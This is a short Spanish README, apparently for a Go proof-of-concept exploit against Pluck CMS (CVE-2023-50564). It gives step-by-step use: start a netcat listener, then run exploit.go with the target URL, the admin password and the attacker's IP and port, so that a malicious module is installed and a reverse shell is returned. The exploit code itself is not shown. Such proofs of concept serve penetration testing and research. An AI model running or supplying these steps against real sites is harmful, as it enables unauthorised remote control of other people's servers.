
Prueba de concepto del exploit para CVE-2023-50564 dirigido a Pluck CMS, que entrega una reverse shell mediante la instalación de un módulo malicioso.
Primero configura un listener para la reverse shell.
Terminal 1
nc -nlvp <lport>
Ejecuta el script que intentará instalar un módulo pluck enviándonos la reverse shell.
Terminal 2
go run exploit.go -url <url> -password <passwd> -i <your-ip> -p <lport>